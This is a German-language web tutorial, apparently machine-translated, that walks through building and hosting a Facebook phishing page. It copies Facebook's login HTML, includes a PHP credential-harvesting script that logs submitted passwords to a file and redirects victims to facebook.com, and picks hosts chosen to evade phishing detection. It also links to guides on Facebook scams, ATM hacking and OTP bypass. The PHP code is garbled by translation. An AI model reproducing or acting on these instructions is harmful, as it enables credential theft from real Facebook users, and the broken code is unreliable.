Inhaltsverzeichnis
- So erstellen Sie einen Facebook-Phishing-Link
- Herunterladen und Speichern des Quellcodes
- LEKTION 2
- Ändern Sie die HTML-Datei der Seite, um Ihre PHP-Datei darin zu integrieren.
- Hosting der PHP-Datei zum Speichern von Passwörtern
- Laden Sie Ihre PHP-Dateien hoch und ändern Sie die Berechtigung
- Konfigurieren der Post.php Forum
- Fazit
So erstellen Sie einen Facebook-Phishing-Link
In letzter Zeit bin ich auf viele Anleitungen zum Erstellen von Phishing-Seiten gestoßen. Obwohl die Prinzipien hinter jedem Leitfaden ähnlich sind, funktionieren die meisten der im Leitfaden bereitgestellten Hosting-Lösungen nicht mehr, da die Hosting-Unternehmen verstärkt gegen Phishing-Seiten vorgehen. In diesem Handbuch werde ich jeden Schritt durchgehen, der zum Erstellen und Hosten einer Phishing-Seite Ihrer Wahl erforderlich ist. Viel Spaß!
Laden Sie den HTML-Index der Zielwebseite herunter
Um zu beginnen, müssen Sie den HTML-Index der Seite abrufen. Es gibt verschiedene Methoden, dies zu tun, es gibt sogar Vorlagen online für beliebte Websites. In diesem Tutorial werde ich den einfachsten Weg verwenden, um so noob-freundlich wie möglich zu sein.
Lesen Sie auch: so erstellen Sie eine Phishing-Site mit kali linux
Navigieren Sie zu Ihrer Webseite
In diesem Tutorial werde ich Facebook Phishing.
Zeigen Sie die Quelle der Webseite an.
Abhängig von Ihrem Browser kann es verschiedene Methoden geben. Normalerweise erfolgt dies, indem Sie mit der rechten Maustaste auf die Site klicken und auf „Quelltext anzeigen“ klicken. Ich habe das in meinem Browser gemacht und ein Windows sollte ähnlich herauskommen:
Auf dem Feld rechts befindet sich die Quelle der Website. Was zum nächsten Schritt führt:
Herunterladen und Speichern des Quellcodes
Markieren Sie das Feld und kopieren Sie alles in das Feld in ein TXT-Dokument. Verwenden Sie Notepad unter Windows und ein einfaches Textbearbeitungsprogramm, wenn Sie Windows nicht verwenden. (Verwenden Sie keine Programme wie Word oder Pages, da diese sehr langsam sind). Nachdem Sie dies getan haben, klicken Sie auf „Speichern unter“ oder eine andere Option, mit der Sie dieses Dokument speichern können. Im Editor sollte es so aussehen:
Ändern Sie „Speichern unter“ in alle Dateien und ändern Sie die Codierung in Unicode.
Danach nennen Sie das Dokument „Index.html“, offensichtlich ohne die Sprachmarken.
Herzlichen Glückwunsch! Sie haben den ersten Schritt des Tutorials abgeschlossen!
Lesen Sie auch: Wie man Facebook Scam macht, ohne gebannt oder blockiert zu werden
LEKTION 2
Erstellen einer PHP-Datei für die Passwortsammlung
Die PHP-Datei ist im Grunde das Tool, das das Kennwort des Benutzers in diesem Szenario erntet. Es gibt mehrere Möglichkeiten, wie Sie dieses PHP erstellen können, wenn Sie einige Programmierkenntnisse haben, aber wenn Sie dies nicht tun, kopieren Sie einfach mein Beispiel PHP.
<?php
header (‚Ort: facebook.com‘);
$ handle = fopen(„Protokoll.txt“, „a“);
foreach ($_POST als $ variable => $ Wert) {
fwrite($handle, $variable);
fwrite($handle, „=“);
fwrite($handle, $ Wert);
fwrite($handle, „\r\n“);
}
fwrite($handle, „\r\n\n\n\n“);
fclose($handle);
ausfahrt;
?>
Speichern Sie die PHP-Datei wie oben als „Alle Dateien“ und als „post.PHP“. Ändern Sie die Codierung in Unicode und Sie sollten bereit sein zu gehen!
Ändern Sie die HTML-Datei der Seite, um Ihre PHP-Datei darin zu integrieren.
Jetzt müssen wir unsere PHP-Datei integrieren, um Passwörter zu erhalten, die die Benutzer senden.
Finden Sie die Methode zum Senden von Passwörtern
Zuerst müssen Sie sehen, wie die Website funktioniert, wenn der Benutzer ein Benutzername-Passwort eingibt.
Für Facebook müssen Sie lediglich Strg-F drücken und „= action“ in das Feld eingeben.
Jetzt müssen Sie alles im unterstrichenen Teil durch „post .php“, halten Sie die Sprachmarkierungen. (nur ein satz bitte).
Offensichtlich unterscheidet sich diese Methode für andere Websites. Eine gute Methode, um es zu finden, ist die Verwendung des Inspect Elements-Tools in den meisten modernen Browsern und das Klicken auf die Schaltfläche Anmelden. Finden Sie etwas Ähnliches wie die obige Methode.
Lesen Sie auch: Erfahren Sie, wie Sie Geldautomatenkarten und Automaten mit der Wizcardo-Software hacken
Bitte beachten Sie: Sie müssen dies später ändern, wenn Sie die Website tatsächlich hosten.
Hosting der PHP-Datei zum Speichern von Passwörtern
Hier ist der saftige Teil, der Ihre gefälschte Website online macht, damit andere sie durchsuchen können.
Sie können alle kostenlosen Hosting-Dienste zum Hosten und Speichern von Passwörtern verwenden. Der Hosting-Plan muss jedoch etwas enthalten, das als „FTP“ bezeichnet wird. Für dieses Tutorial werde ich 000webhost verwenden.
Navigieren Sie zum FTP-Server für Ihren Webhosting-Dienst
Für diesen Schritt gehe ich davon aus, dass Sie bereits eine Website mit Ihrem Hosting-Dienst erstellt haben.
Für 000webhost klicken Sie einfach auf „Dateimanager“ und dann auf „Dateien hochladen“. Hier ist ein Bild des FTP-Servers für 000webhost:
Ignoriere die anderen Dateien, das sind nur einige meiner persönlichen Sachen, die nichts mit diesem Tutorial zu tun haben.
Laden Sie Ihre PHP-Dateien hoch und ändern Sie die Berechtigung
Wie Sie sehen, habe ich meine PHP-Datei bereits hochgeladen. Sie müssen es jedoch nur in den Hauptordner Ihres FTP-Servers hochladen. (Einige FTP-Server erlauben es Ihnen nicht, in den Stammordner hochzuladen, folgen Sie einfach ihren speziellen Anweisungen).
Jetzt müssen Sie die Berechtigung auf „777“ ändern, was im Grunde jede einzelne Berechtigung ist. Wenn Sie aufgefordert werden, die Kontrollkästchen für die Berechtigungen zu aktivieren, aktivieren Sie einfach jedes einzelne.
Jetzt können Sie den FTP-Server schließen. Notieren Sie sich Ihre Webadresse!
Lesen Sie auch: Schrittanweisungen zum Umgehen der OTP-Überprüfung auf Websites
Hosten der tatsächlichen Phishing-Seite
Für diesen Schritt müssen Sie genau den Hosting-Anbieter verwenden, den ich verwende, andernfalls werden Sie gesperrt.
Es gibt einen Grund, warum ich nicht denselben Hosting-Anbieter für meine eigentliche Seite verwende, und das liegt daran, dass die meisten Hosting-Anbieter eine Art Scan durchführen, um Phishing-Seiten zu erkennen. Ich habe in der Vergangenheit mehrere Hosting-Dienste ausprobiert und alle haben mich innerhalb von 30 Minuten nach dem Hochladen der Indexdatei gesperrt.
Konfigurieren der Post.php Forum
Bevor Sie die Website hosten, denken Sie an den Beitrag.php / Anmeldeformular, was wir oben konfiguriert haben?
Sie müssen das Anmeldeformular wieder in Ihrem Index finden.html und ersetzen Sie die „post.php“ mit „http://yourwebsiteforyourpostphpupload/post.php“, vorausgesetzt, Sie haben in den Stammordner hochgeladen. Denken Sie daran, http: // vor der Site hinzuzufügen. Um dies zu testen, navigieren Sie zur Website (http://yourwebsiteforyourpostphpupload/post.php) und prüfen Sie, ob Sie zu Facebook weitergeleitet werden.mit, Wenn dies der Fall ist, haben Sie die richtige Site eingefügt. Wenn dies nicht der Fall ist, überprüfen Sie erneut, ob Sie Ihre Datei in das richtige Verzeichnis hochgeladen haben.
Hosting der aktuellen Seite
Navigieren Sie zu htmlpasta.com . Sie werden etwas Ähnliches sehen:
Dann müssen Sie den Index kopieren.HTML-Datei für Ihre Phishing-Website und fügen Sie sie hier ein.
Klicken Sie nun auf den Link und klicken Sie auf Einfügen.
Fazit
Herzlichen Glückwunsch! Sie haben das Hosting Ihrer ersten Phishing-Site abgeschlossen! Navigieren Sie zu Ihrer Website und versuchen Sie, einige gefälschte Anmeldedaten einzugeben, nachdem Sie auf die Schaltfläche Anmelden geklickt haben, es sollte Sie weiterleiten zu facebook.com . Melden Sie sich bei Ihrem FTP-Server an, auf dem Sie Ihren Beitrag gehostet haben.PHP-Datei, und es sollte ein neues Dokument namens Log geben.txt, das im selben Ordner wie Ihr Beitrag gespeichert ist.PHP-Datei. Alle Login-Daten sollten dort gespeichert werden.
Lesen Sie auch: 2020 yahoo Yahoo-Format, Abrechnungsformat, PDF-Download
Bitte verwenden Sie dies nicht für böswillige Zwecke, sondern nur für Penetrationstests und mit Genehmigung Ihres Opfers.
